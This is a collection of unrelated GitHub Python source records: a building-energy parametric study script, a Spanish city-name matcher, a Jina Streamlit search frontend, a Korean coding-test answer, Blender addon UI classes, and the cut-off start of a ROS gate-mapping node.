bsh_api.measures.ShadeOverhang('n')\noverhangn.set_datalist(overhang_north)\nmeasures.append(overhangn)\n\noverhangs = bsh_api.measures.ShadeOverhang('s')\noverhangs.set_datalist(overhang_south)\nmeasures.append(overhangs)\n\noverhangw = bsh_api.measures.ShadeOverhang('w')\noverhangw.set_datalist(overhang_west)\nmeasures.append(overhangw)\n\noverhange = bsh_api.measures.ShadeOverhang('e')\noverhange.set_datalist(overhang_east)\nmeasures.append(overhange)\n\nfinn = bsh_api.measures.ShadeFin('n')\nfinn.set_datalist(fin_north)\nmeasures.append(finn)\n\nfins = bsh_api.measures.ShadeFin('s')\nfins.set_datalist(fin_south)\nmeasures.append(fins)\n\nfinw = bsh_api.measures.ShadeFin('w')\nfinw.set_datalist(fin_west)\nmeasures.append(finw)\n\nfine = bsh_api.measures.ShadeFin('e')\nfine.set_datalist(fin_east)\nmeasures.append(fine)\n\nwallr = bsh_api.measures.WallRValue(wall_unit)\nwallr.set_datalist(wall_rvalue)\nmeasures.append(wallr)\n\nroofr = bsh_api.measures.RoofRValue(roof_unit)\nroofr.set_datalist(roof_rvalue)\nmeasures.append(roofr)\n\nwinu = bsh_api.measures.WindowUValue(window_u_unit)\nwinu.set_datalist(window_uvalue)\nmeasures.append(winu)\n\nwinshgc = bsh_api.measures.WindowSHGC()\nwinshgc.set_datalist(window_shgc)\nmeasures.append(winshgc)\n\n# Add measures to the new parametric study\nnew_pj.add_model_measures(measures)\n\n# Now we start!\nresults = new_pj.submit_parametric_study(track=True)\nprint(results)\n\n'''\nBelow are post-processing code\nResults carries the API calls to retrieve your parametric simulations\n\nIn 
this case, we showed two post-process methods:\n1. get the results in pandas dataframe\n2. plot it in a parallel coordinate chart.\n'''\nif results:\n # Collect results\n result_dict = results.net_site_eui()\n result_unit = results.last_parameter_unit\n # Plot\n plot = pp.ParametricPlot(result_dict, result_unit)\n print(plot.pandas_df())\n\n","repo_name":"weilix88/buildsimhub_python_api","sub_path":"modelingstandard/ModelCycleOne.py","file_name":"ModelCycleOne.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"81"} +{"seq_id":"24089145945","text":"\"\"\"\r\nImportamos la biblioteca difflib, que nos ayudará a buscar nombres similares.\r\n\"\"\"\r\nimport difflib\r\n\r\n# Lista de nombres conocidos y sus códigos IATA en minúsculas\r\nnombres_abreviados = {\r\n \"ciudad de méxico\": [\"ciudad de méxico\", \"mex\", \"cdmx\", \"mxm\", \"mejico\"],\r\n \"guadalajara\": [\"guadalajara\", \"gdl\", \"miguel hidalgo y costilla\"],\r\n \"cancun\": [\"cancun\", \"cun\"],\r\n \"acapulco\": [\"acapulco\", \"aca\", \"pulc\"],\r\n \"aguascalientes\": [\"aguascalientes\", \"agu\"],\r\n \"guanajuato\": [\"guanajuato\", \"bjx\"],\r\n \"ciudad juárez\": [\"ciudad juárez\", \"cjs\", \"juá\"],\r\n \"ciudad del carmen\": [\"ciudad del carmen\", \"cme\", \"car\"],\r\n \"chetumal\": [\"chetumal\", \"ctm\"],\r\n \"chihuahua\": [\"chihuahua\", \"cuu\"],\r\n \"cozumel\": [\"cozumel\", \"czm\", \"ozu\"],\r\n \"hermosillo\": [\"hermosillo\", \"hmo\", \"rmo\"],\r\n \"santa maría huatulco\": [\"huatulco\", \"hux\", \"santa maría huatulco\"],\r\n \"mérida\": [\"mérida\", \"mid\"],\r\n \"oaxaca\": [\"oaxaca\", \"oax\", \"axa\"],\r\n \"puebla\": [\"puebla\", \"pbc\", \"ebla\"],\r\n \"amsterdam\": [\"amsterdam\", \"ams\"],\r\n \"atlanta\": [\"atlanta\", \"atl\"],\r\n \"bogotá\": [\"bogotá\", \"el dorado\", \"bog\"],\r\n \"belize\": [\"belize\", \"philip s.w. 
goldson\", \"bze\"],\r\n \"paris\": [\"paris\", \"cdg\", \"paris-charles de gaulle\"],\r\n \"ciudad obregón\": [\"ciudad obregón\", \"cen\"],\r\n \"north carolina\": [\"north carolina\", \"charlotte-douglas\", \"clt\"],\r\n \"texas\": [\"texas\", \"dallas/fort worth\", \"dfw\"],\r\n \"guatemala city\": [\"guatemala city\", \"gua\"],\r\n \"habana\": [\"habana\",\"havana\", \"hav\", \"cuba\", \"cub\", \"HAV\", \"OACI\", \"MUHA\"],\r\n \"houston\": [\"houston\", \"iah\"],\r\n \"queens\": [\"queens\", \"jfk\"],\r\n \"los angeles\": [\"lax\", \"los angeles\"],\r\n \"lima\": [\"lima\", \"lim\"],\r\n \"madrid\": [\"madrid\", \"mad\"],\r\n \"miami\": [\"miami\", \"mia\"],\r\n \"mazatlán\": [\"mazatlán\", \"mzt\"],\r\n \"chicago\": [\"chicago\", \"ord\"],\r\n \"houston\": [\"houston\", \"phl\"],\r\n \"philadelphia\": [\"philadelphia\", \"phl\"],\r\n \"phoenix\": [\"phoenix\", \"phx\"],\r\n \"santiago\": [\"santiago\", \"scl\"],\r\n \"vancouver\": [\"vancouver\", \"yvr\"],\r\n \"toronto\": [\"toronto\", \"yyz\"],\r\n \"puerto vallarta\": [\"puerto vallarta\", \"pvr\", \"licenciado gustavo díaz ordaz\"],\r\n \"puerto escondido\": [\"puerto escondido\", \"pxm\"],\r\n \"querétaro\": [\"querétaro\", \"qro\", \"eré\"],\r\n \"san luis potosí\": [\"san luis potosí\", \"slp\", \"otosí\"],\r\n \"tampico\": [\"tampico\", \"tam\"],\r\n \"toluca\": [\"toluca\", \"tlc\", \"ait\"],\r\n \"torreón\": [\"francisco sarabia\", \"trc\", \"torreón\"],\r\n \"villahermosa\": [\"carlos rovirosa pérez\", \"vsa\", \"villahermosa\"],\r\n \"zacatecas\": [\"zacatecas\", \"zcl\"],\r\n \"ixtapa-zihuatanejo\": [\"zihuatanejo\", \"zih\"],\r\n \"zihuatanejo\": [\"zihuatanejo\", \"zih\"],\r\n \"tijuana\": [\"tijuana\", \"tij\"],\r\n \"sonora\": [\"sonora\", \"son\", \"Hermosillo\", \"HMO\"],\r\n \"veracruz\": [\"veracruz\", \"ver\", \"acruz\"],\r\n \"monterrey\": [\"monterrey\", \"mty\", \"mon\"],\r\n \"peru\" : [\"cuba\", \"per\", \"SPJC\"],\r\n \"bolivia\" : [\"bolivia\", \"bol\", \"CBB\"]\r\n}\r\n\r\ndef encontrar_nombre_similar(entrada_usuario):\r\n \"\"\"\r\n Función que busca un nombre similar en la lista de nombres conocidos\r\n basándose en la entrada proporcionada por el usuario.\r\n\r\n Args:\r\n entrada_usuario (str): La entrada del usuario.\r\n\r\n Returns:\r\n str: El nombre similar encontrado o None si no se encuentra ninguna coincidencia.\r\n \"\"\"\r\n if isinstance(entrada_usuario, str):\r\n entrada_usuario = entrada_usuario.lower()\r\n else:\r\n # Manejar la entrada incorrecta de alguna manera, como mostrar un mensaje de error.\r\n return None\r\n \r\n for nombre, abreviaturas in nombres_abreviados.items():\r\n if entrada_usuario in abreviaturas:\r\n return nombre\r\n coincidencias = difflib.get_close_matches(entrada_usuario, nombres_abreviados.keys(), n=1, cutoff=0.4)\r\n \r\n if coincidencias:\r\n return coincidencias[0]\r\n else:\r\n return None","repo_name":"Anthonyafk/Clima-Connect","sub_path":"myproject/utils/SintaxisErrorsbyUser.py","file_name":"SintaxisErrorsbyUser.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17859108463","text":"import base64\nimport os\nimport sys\nfrom copy import deepcopy\nfrom urllib.request import urlopen\n\nimport av\nimport numpy as np\nimport streamlit as st\nfrom docarray import DocumentArray\nfrom jina import Client, Document\nfrom streamlit_webrtc import ClientSettings, webrtc_streamer\n\nWEBRTC_CLIENT_SETTINGS = ClientSettings(\n rtc_configuration={\"iceServers\": 
[{\"urls\": [\"stun:stun.l.google.com:19302\"]}]},\n media_stream_constraints={\"video\": True, \"audio\": False},\n)\n\n\nroot_data_dir = (\n 'https://storage.googleapis.com/jina-fashion-data/data/one-line/datasets/'\n)\n\nds_set = {\n 'nft-monkey',\n 'deepfashion',\n 'nih-chest-xrays',\n 'stanford-cars',\n 'bird-species',\n 'best-artworks',\n 'geolocation-geoguessr',\n 'rock-lyrics',\n 'pop-lyrics',\n 'rap-lyrics',\n 'indie-lyrics',\n 'metal-lyrics',\n}\n\n\ndef deploy_streamlit():\n \"\"\"\n We want to provide the end-to-end experience to the user.\n Please deploy a streamlit frontend on k8s/local to access the api.\n You can get the starting point for the streamlit application from alex.\n \"\"\"\n setup_session_state()\n print('Run Streamlit with:', sys.argv)\n _, host, port, output_modality, data = sys.argv\n da_img = None\n da_txt = None\n\n # General\n TOP_K = 9\n DEBUG = os.getenv(\"DEBUG\", False)\n DATA_DIR = \"../data/images/\"\n\n if data in ds_set:\n if output_modality == 'image':\n output_modality_dir = 'jpeg'\n data_dir = root_data_dir + output_modality_dir + '/'\n da_img, da_txt = load_data(data_dir + data + '.img10.bin'), load_data(\n data_dir + data + '.txt10.bin'\n )\n elif output_modality == 'text':\n # for now deactivated sample images for text\n output_modality_dir = 'text'\n data_dir = root_data_dir + output_modality_dir + '/'\n da_txt = load_data(data_dir + data + '.txt10.bin')\n\n if output_modality == 'text':\n # censor words in text incl. in custom data\n from better_profanity import profanity\n\n profanity.load_censor_words()\n\n class UI:\n about_block = \"\"\"\n ### About\n This is a meme search engine using [Jina's neural search framework](https://github.com/jina-ai/jina/).\n - [Live demo](https://examples.jina.ai/memes)\n - [Play with it in a notebook](https://colab.research.google.com/github/jina-ai/workshops/blob/main/memes/meme_search.ipynb) (t-only)\n - [Repo](https://github.com/alexcg1/jina-meme-search)\n - [Dataset](https://www.kaggle.com/abhishtagatya/imgflipscraped-memes-caption-dataset)\n \"\"\"\n\n css = \"\"\"\n \n \"\"\"\n\n def search_by_t(input, server, port, limit=TOP_K):\n print('initialize client at', server, port)\n client = Client(host=server, protocol=\"grpc\", port=port)\n print('search text', server, port)\n response = client.search(\n Document(text=input),\n parameters={\"limit\": limit, 'filter': {}},\n return_results=True,\n show_progress=True,\n )\n\n return response[0].matches\n\n def search_by_file(document, server, port, limit=TOP_K):\n \"\"\"\n Wrap file in Jina Document for searching, and do all necessary conversion to make similar to indexed Docs\n \"\"\"\n print('connect client to ', server, port)\n client = Client(host=server, protocol=\"grpc\", port=port)\n query_doc = document\n if query_doc.blob != b'':\n query_doc.convert_blob_to_image_tensor()\n query_doc.set_image_tensor_shape((224, 224))\n response = client.search(\n query_doc,\n parameters={\"limit\": limit, 'filter': {}},\n return_results=True,\n show_progress=True,\n )\n\n return response[0].matches\n\n def convert_file_to_document(query):\n data = query.read()\n doc = Document(blob=data)\n return doc\n\n # Layout\n st.set_page_config(page_title=\"NOW\", page_icon='https://jina.ai/favicon.ico')\n\n st.markdown(\n body=UI.css,\n unsafe_allow_html=True,\n )\n col1, mid, col2 = st.columns([1, 1, 20])\n with col1:\n st.image('https://jina.ai/favicon.ico', width=60)\n with col2:\n st.header(\"NOW \")\n\n # design and create toggle button\n st.write(\n '',\n 
unsafe_allow_html=True,\n )\n st.write(\n '',\n unsafe_allow_html=True,\n )\n if output_modality == 'image':\n media_type = st.radio(\n '',\n [\"Text\", \"Image\", 'Webcam'],\n on_change=clear_match,\n )\n elif output_modality == 'text':\n media_type = st.radio(\n '',\n [\"Image\", \"Text\", 'Webcam'],\n on_change=clear_match,\n )\n\n if media_type == \"Image\":\n upload_c, preview_c = st.columns([12, 1])\n query = upload_c.file_uploader(\"\")\n if query:\n doc = convert_file_to_document(query)\n st.image(doc.blob, width=160)\n st.session_state.matches = search_by_file(\n document=doc, server=host, port=port\n )\n if da_img is not None:\n st.subheader(\"samples:\")\n img_cs = st.columns(5)\n txt_cs = st.columns(5)\n for doc, c, txt in zip(da_img, img_cs, txt_cs):\n with c:\n st.image(doc.blob if doc.blob else doc.tensor, width=100)\n with txt:\n if st.button('Search', key=doc.id):\n st.session_state.matches = search_by_file(\n document=doc,\n server=host,\n port=port,\n )\n\n elif media_type == \"Text\":\n query = st.text_input(\"\", key=\"text_search_box\")\n if query:\n st.session_state.matches = search_by_t(input=query, server=host, port=port)\n if st.button(\"Search\", key=\"text_search\"):\n st.session_state.matches = search_by_t(input=query, server=host, port=port)\n if da_txt is not None:\n st.subheader(\"samples:\")\n c1, c2, c3 = st.columns(3)\n c4, c5, c6 = st.columns(3)\n for doc, col in zip(da_txt, [c1, c2, c3, c4, c5, c6]):\n with col:\n if st.button(doc.content, key=doc.id, on_click=clear_text):\n st.session_state.matches = search_by_t(\n input=doc.content, server=host, port=port\n )\n\n elif media_type == 'Webcam':\n snapshot = st.button('Snapshot')\n\n class VideoProcessor:\n snapshot: np.ndarray = None\n\n def recv(self, frame):\n self.snapshot = frame.to_ndarray(format=\"rgb24\")\n return av.VideoFrame.from_ndarray(self.snapshot, format='rgb24')\n\n ctx = webrtc_streamer(\n key=\"jina-now\",\n video_processor_factory=VideoProcessor,\n client_settings=WEBRTC_CLIENT_SETTINGS,\n )\n\n if ctx.video_processor:\n if snapshot:\n query = ctx.video_processor.snapshot\n st.image(query, width=160)\n st.session_state.snap = query\n doc = Document(tensor=query)\n doc.convert_image_tensor_to_blob()\n st.session_state.matches = search_by_file(\n document=doc, server=host, port=port\n )\n elif st.session_state.snap is not None:\n st.image(st.session_state.snap, width=160)\n else:\n clear_match()\n\n if st.session_state.matches:\n matches = deepcopy(st.session_state.matches)\n st.header('Search results')\n # Results area\n c1, c2, c3 = st.columns(3)\n c4, c5, c6 = st.columns(3)\n c7, c8, c9 = st.columns(3)\n all_cs = [c1, c2, c3, c4, c5, c6, c7, c8, c9]\n # # TODO dirty hack to filter out text. Instead output modality should be passed as parameter\n # matches = [m for m in matches if m.tensor is None]\n for m in matches:\n m.scores['cosine'].value = 1 - m.scores['cosine'].value\n sorted(matches, key=lambda m: m.scores['cosine'].value, reverse=True)\n matches = [\n m\n for m in matches\n if m.scores['cosine'].value > st.session_state.min_confidence\n ]\n for c, match in zip(all_cs, matches):\n match.mime_type = output_modality\n\n if output_modality == 'text':\n display_text = profanity.censor(match.text)\n body = f\"
{display_text}
\"\n if match.tags.get('additional_info'):\n additional_info = match.tags.get('additional_info')\n if type(additional_info) == str:\n additional_info_text = additional_info\n elif type(additional_info) == list:\n if len(additional_info) == 1:\n # assumes just one line containing information on text name and creator, etc.\n additional_info_text = additional_info\n elif len(additional_info) == 2:\n # assumes first element is text name and second element is creator name\n additional_info_text = (\n f\"{additional_info[0]} \"\n f\"by {additional_info[1]}\"\n )\n else:\n additional_info_text = \" \".join(additional_info)\n body += f\"
{additional_info_text}
\"\n body += \"\"\n c.markdown(\n body=body,\n unsafe_allow_html=True,\n )\n elif match.uri is not None:\n if match.blob != b'':\n match.convert_blob_to_datauri()\n if match.tensor is not None:\n match.convert_image_tensor_to_uri()\n c.image(match.convert_blob_to_datauri().uri)\n st.markdown(\"\"\"---\"\"\")\n st.session_state.min_confidence = st.slider(\n 'Confidence threshold',\n 0.0,\n 1.0,\n key='slider',\n on_change=update_conf,\n )\n\n\ndef update_conf():\n st.session_state.min_confidence = st.session_state.slider\n\n\ndef clear_match():\n st.session_state.matches = None\n st.session_state.slider = 0.0\n st.session_state.min_confidence = 0.0\n st.session_state.snap = None\n\n\ndef clear_text():\n st.session_state.text_search_box = ''\n\n\ndef load_data(data_path: str) -> DocumentArray:\n if data_path.startswith('http'):\n try:\n # TODO try except is used as workaround\n # in case load_data is called two times from two frontends it can happen that\n # one of the calls created the directory right after checking that it does not exist\n # this caused errors. Now the error will be ignored.\n # Can not use `exist=True` because it is not available in py3.7\n os.makedirs('data/tmp')\n except:\n pass\n url = data_path\n data_path = (\n f\"data/tmp/{base64.b64encode(bytes(url, 'utf-8')).decode('utf-8')}.bin\"\n )\n if not os.path.exists(data_path):\n with urlopen(url) as f:\n content = f.read()\n with open(data_path, 'wb') as f:\n f.write(content)\n\n try:\n da = DocumentArray.load_binary(data_path)\n except Exception:\n da = DocumentArray.load_binary(data_path, compress='gzip')\n return da\n\n\ndef setup_session_state():\n if 'matches' not in st.session_state:\n st.session_state.matches = None\n\n if 'min_confidence' not in st.session_state:\n st.session_state.min_confidence = 0.0\n\n if 'im' not in st.session_state:\n st.session_state.im = None\n\n if 'snap' not in st.session_state:\n st.session_state.snap = None\n\n\nif __name__ == '__main__':\n deploy_streamlit()\n","repo_name":"zhenwang23/now","sub_path":"now/frontend/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":12832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"75084138186","text":"'''\n시간\n제한: 2\n초메모리\n제한: 256\nMB\n문제\n설명\n세\n자매가\n해외여행\n중\n기념품\n가게에\n왔습니다.\n\n이\n기념품\n가게에서는\n한번에\n50\n달러\n이상\n지출하면, 10\n달러를\n할인해주는\n행사를\n하고\n있습니다.\n그녀들은\n구매한\n물건을\n합하여\n계산하면, 각자\n따로\n지불하는\n것보다\n적게\n지불할\n수\n있다는\n것을\n깨달았습니다.\n\n예를들어\n그들이\n각각\n46\n달러, 62\n달러, 9\n달러만큼의\n상품을\n구입하는\n경우, 46\n달러와\n9\n달러를\n합치는\n것으로\n2\n번의\n구매를\n할\n수\n있습니다.\n이렇게\n하면\n55\n달러와\n62\n달러로\n거래하게\n되어\n총\n20\n달러의\n할인을\n받을\n수\n있습니다.\n\n여기\ngoods\n가\n주어집니다.\ngoods\n의\n각\n요소는\n한\n명이\n구매하려는\n물품의\n총\n비용입니다.\n\n세\n자매가\n모든\n상품을\n구입하는데\n드는\n최소\n비용을\n리턴하세요.\n\n(그녀들은 위 설명처럼 합쳐서 구매할 수 있지만, 자기가 구입할 상품을 나눠서 구매하지는 않습니다.)\n\n참고 / 제약\n사항\ngoods\n는\n오직\n3\n개의\n요소만\n가집니다.\ngoods\n의\n각\n요소는\n1\n이상\n99\n이하의\n정수입니다.\n테스트\n케이스\ngoods = [46, 62, 9]\n리턴(정답): 97\n문제\n설명에\n나온\n예제입니다.\n\ngoods = [50, 62, 93]\n리턴(정답): 175\n모두\n각자\n계산하는\n것이\n가장\n좋은\n방법입니다.\n\ngoods = [5, 31, 15]\n리턴(정답): 41\n세\n번의\n구매를\n한번에\n합쳐서\n해야\n구매\n비용을\n가장\n낮출\n수\n있습니다.\n\ngoods = [5, 3, 15]\n리턴(정답): 23\n할인\n행사를\n받을\n방법이\n존재하지\n않습니다.\n'''\n\n#핵심 소스코드의 설명을 주석으로 작성하면 평가에 큰 도움이 됩니다.\nclass Solution:\n def solution(self, goods):\n tmp =0\n sum = 0\n for i in goods:\n if i>=50 :\n i = i-10\n sum += i\n else:\n tmp += i\n if tmp>=50:\n tmp -=10\n sum += tmp\n else:\n sum += tmp\n return 
sum\n\n\n\n","repo_name":"moonyeol/algorithm","sub_path":"python/한이음ict코테-1.py","file_name":"한이음ict코테-1.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42603627779","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n\n# library imports\nimport bpy\nfrom bpy_extras.io_utils import ImportHelper\nimport os\nimport math\nimport shutil\nfrom mathutils import Vector\n\n# addon imports\nfrom .. import conf\nfrom .. import util\nfrom . import mobs\nfrom .. import tracking\n\n\n# -----------------------------------------------------------------------------\n# class definitions\n# -----------------------------------------------------------------------------\n\n\nclass MCPREP_OT_reload_spawners(bpy.types.Operator):\n\t\"\"\"Relaod meshswapping and spawning lists\"\"\"\n\tbl_idname = \"mcprep.reload_spawners\"\n\tbl_label = \"Reload meshswap and mob spawners\"\n\tbl_options = {'REGISTER', 'UNDO'}\n\n\t@tracking.report_error\n\tdef execute(self, context):\n\t\tbpy.ops.mcprep.reload_meshswap()\n\t\tbpy.ops.mcprep.reload_mobs()\n\t\tbpy.ops.mcprep.reload_items()\n\t\treturn {'FINISHED'}\n\n\nclass MCPREP_OT_spawn_path_reset(bpy.types.Operator):\n\t\"\"\"Reset the spawn path to the default specified in the addon preferences panel\"\"\"\n\tbl_idname = \"mcprep.spawn_path_reset\"\n\tbl_label = \"Reset spawn path\"\n\tbl_options = {'REGISTER', 'UNDO'}\n\n\t@tracking.report_error\n\tdef execute(self,context):\n\t\taddon_prefs = util.get_user_preferences(context)\n\t\tcontext.scene.mcprep_mob_path = addon_prefs.mob_path\n\t\tmobs.update_rig_list(context)\n\t\treturn {'FINISHED'}\n\n\n# -----------------------------------------------------------------------------\n#\tUI list related\n# -----------------------------------------------------------------------------\n\n\nclass MCPREP_UL_mob(bpy.types.UIList):\n\t\"\"\"For mob asset listing UIList drawing\"\"\"\n\tdef draw_item(self, context, layout, data, set, icon, active_data, active_propname, index):\n\t\ticon = \"mob-{}\".format(set.index)\n\t\tif self.layout_type in {'DEFAULT', 'COMPACT'}:\n\t\t\tif not conf.use_icons:\n\t\t\t\tlayout.label(text=set.name)\n\t\t\telif conf.use_icons and icon in conf.preview_collections[\"mobs\"]:\n\t\t\t\tlayout.label(text=set.name,\n\t\t\t\t\ticon_value=conf.preview_collections[\"mobs\"][icon].icon_id)\n\t\t\telse:\n\t\t\t\tlayout.label(text=set.name, icon=\"BLANK1\")\n\n\t\telif self.layout_type in {'GRID'}:\n\t\t\tlayout.alignment = 'CENTER'\n\t\t\tif conf.use_icons and icon in conf.preview_collections[\"mobs\"]:\n\t\t\t\tlayout.label(text=\"\",\n\t\t\t\t\ticon_value=conf.preview_collections[\"mobs\"][icon].icon_id)\n\t\t\telse:\n\t\t\t\tlayout.label(text=\"\", 
icon='QUESTION')\n\n\nclass MCPREP_UL_meshswap(bpy.types.UIList):\n\t\"\"\"For meshswap asset listing UIList drawing\"\"\"\n\tdef draw_item(self, context, layout, data, set, icon, active_data, active_propname, index):\n\t\tif self.layout_type in {'DEFAULT', 'COMPACT'}:\n\t\t\tlayout.label(text=set.name)\n\t\t\t# col.prop(set, \"name\", text=\"\", emboss=False)\n\n\t\telif self.layout_type in {'GRID'}:\n\t\t\tlayout.alignment = 'CENTER'\n\t\t\tlayout.label(text=\"\", icon='QUESTION')\n\n\nclass MCPREP_UL_item(bpy.types.UIList):\n\t\"\"\"For meshswap asset listing UIList drawing\"\"\"\n\tdef draw_item(self, context, layout, data, set, icon, active_data, active_propname, index):\n\t\ticon = \"item-{}\".format(set.index)\n\t\tif self.layout_type in {'DEFAULT', 'COMPACT'}:\n\t\t\tif not conf.use_icons:\n\t\t\t\tlayout.label(text=set.name)\n\t\t\telif conf.use_icons and icon in conf.preview_collections[\"items\"]:\n\t\t\t\tlayout.label(text=set.name,\n\t\t\t\t\ticon_value=conf.preview_collections[\"items\"][icon].icon_id)\n\t\t\telse:\n\t\t\t\tlayout.label(text=set.name, icon=\"BLANK1\")\n\n\t\telif self.layout_type in {'GRID'}:\n\t\t\tlayout.alignment = 'CENTER'\n\t\t\tif conf.use_icons and icon in conf.preview_collections[\"items\"]:\n\t\t\t\tlayout.label(text=\"\",\n\t\t\t\t\ticon_value=conf.preview_collections[\"items\"][icon].icon_id)\n\t\t\telse:\n\t\t\t\tlayout.label(text=\"\", icon='QUESTION')\n\n\nclass ListMobAssetsAll(bpy.types.PropertyGroup):\n\t\"\"\"For listing hidden group of all mobs, regardless of category\"\"\"\n\tdescription = bpy.props.StringProperty()\n\tcategory = bpy.props.StringProperty()\n\tmcmob_type = bpy.props.StringProperty()\n\tindex = bpy.props.IntProperty(min=0, default=0) # for icon drawing\n\n\nclass ListMobAssets(bpy.types.PropertyGroup):\n\t\"\"\"For UI drawing of mob assets and holding data\"\"\"\n\tdescription = bpy.props.StringProperty()\n\tcategory = bpy.props.StringProperty() # category it belongs to\n\tmcmob_type = bpy.props.StringProperty()\n\tindex = bpy.props.IntProperty(min=0, default=0) # for icon drawing\n\n\nclass ListMeshswapAssets(bpy.types.PropertyGroup):\n\t\"\"\"For UI drawing of meshswap assets and holding data\"\"\"\n\tblock = bpy.props.StringProperty() # virtual enum, Group/name\n\tdescription = bpy.props.StringProperty()\n\n\nclass ListItemAssets(bpy.types.PropertyGroup):\n\t\"\"\"For UI drawing of item assets and holding data\"\"\"\n\t# inherited: name\n\tdescription = bpy.props.StringProperty()\n\tpath = bpy.props.StringProperty(subtype='FILE_PATH')\n\tindex = bpy.props.IntProperty(min=0, default=0) # for icon drawing\n\n\n# -----------------------------------------------------------------------------\n#\tRegistration\n# -----------------------------------------------------------------------------\n\n\nclasses = (\n\tListMobAssetsAll,\n\tListMobAssets,\n\tListMeshswapAssets,\n\tListItemAssets,\n\tMCPREP_UL_mob,\n\tMCPREP_UL_meshswap,\n\tMCPREP_UL_item,\n\tMCPREP_OT_reload_spawners,\n\tMCPREP_OT_spawn_path_reset,\n)\n\n\ndef register():\n\tfor cls in classes:\n\t\tutil.make_annotations(cls)\n\t\tbpy.utils.register_class(cls)\n\n\ndef unregister():\n\tfor cls in reversed(classes):\n\t\tbpy.utils.unregister_class(cls)\n","repo_name":"Xinecraft/MCprep","sub_path":"MCprep_addon/spawner/spawn_util.py","file_name":"spawn_util.py","file_ext":"py","file_size_in_byte":6024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"19875742369","text":"#!/usr/bin/env python\n\"\"\"\nBuild a map of observed 
markers relative to the camera.\nPipeline\n1. Subscribe detected markers pose\n2. Subscribe ego pose in time\n3. Transform markers local pose to world pose\n4. Data association: Identify unique gates by Weighted nearest neighbour (euclidean distance threshold?)\n4.5. Correct flipping Z axis with a median moving window?\n5. Update pose estimation per observed gate. Lineal KF\n6. Publish results as markers for visualization and topic for Planning\n7. RMSE Error calculation with ground truth\n\nTODO:\n - Include new message array with confidence per gate by numbers of observations per period\n - Use real ego pose covariances to compute KF\n - Weighted median average for low confidence gates\n\n\"\"\"\n\n\nfrom __future__ import print_function\n\nimport rospy\n\nfrom visualization_msgs.msg import Marker, MarkerArray\nfrom markertracker_node.msg import GateMarker, GateMarkersArray\nfrom tf2_geometry_msgs import do_transform_pose\nfrom geometry_msgs.msg import Point, PoseWithCovarianceStamped, PoseArray, Pose #, Point32\n\nimport tf2_ros as tf2\nimport math\n#import tf.transformations\n\n\nclass Gate:\n\n def __init__(self, _id):\n\n # TODO: Move to params\n self.observations_size = 75 # Only the most relevant observations are kept\n\n # Put better ones at top, worse ones at the button\n self.observations = list()\n\n self.total_observations = 0\n self.confidence = 0.0\n\n self.id = _id\n self.name = 'Gate'+str(_id)\n\n print('*** New gate:' + self.name)\n\n def add_marker_observation(self, marker):\n\n self.total_observations += 1\n\n observation = {}\n observation['pose'] = marker.pose_cov_stamped.pose.pose.pose\n observation['covariance'] = marker.pose_cov_stamped.pose.covariance\n _area = self._area_of_quadrilateral(marker.corners)\n observation['weight'] = _area\n\n if len(self.observations) >= self.observations_size: # start popping\n if _area < self.observations[-1]['weight']:\n return\n else:\n self.observations.pop(-1)\n\n self.observations.append(observation)\n\n self.observations = sorted(self.observations, key=lambda o: o['weight'], reverse=True)\n\n self.confidence = self._calc_confidence()\n\n #print(self.observations[0])\n\n def _calc_confidence(self):\n # [0,1] Confidence based on observations to be sure about a gate is real\n #confidence = self.total_observations / self.observations_size\n\n confidence = len(self.observations) / float(self.observations_size)\n if confidence > 1.0: confidence = 1.0\n\n return confidence\n\n def get_best_pose_estimation(self):\n\n pose = self.observations[0]['pose']\n\n return pose\n\n def _area_of_quadrilateral(self, corners):\n a = math.sqrt((corners[0] - corners[2]) ** 2 + (corners[1] - corners[3]) ** 2)\n b = math.sqrt((corners[2] - corners[4]) ** 2 + (corners[3] - corners[5]) ** 2)\n c = math.sqrt((corners[4] - corners[6]) ** 2 + (corners[5] - corners[7]) ** 2)\n d = math.sqrt((corners[6] - corners[0]) ** 2 + (corners[7] - corners[1]) ** 2)\n return (a + b + c + d) / 2\n\n def euclidean_distance_observation(self, marker):\n point1 = self.observations[0]['pose'].position\n point2 = marker.pose_cov_stamped.pose.pose.pose.position\n return math.sqrt((point2.x - point1.x) ** 2 + (point2.y - point1.y) ** 2 + (point2.z - point1.z) ** 2)\n\n\nclass GateMap:\n\n def __init__(self):\n self.gates = list()\n # TODO: move to params\n self.d_threshold = 3 # cluster observation when closer than threshold by euclidean distance in meters\n\n def process_marker_observation(self, marker):\n\n # First observation\n\n if len(self.gates) == 0:\n gate = Gate(1)\n 
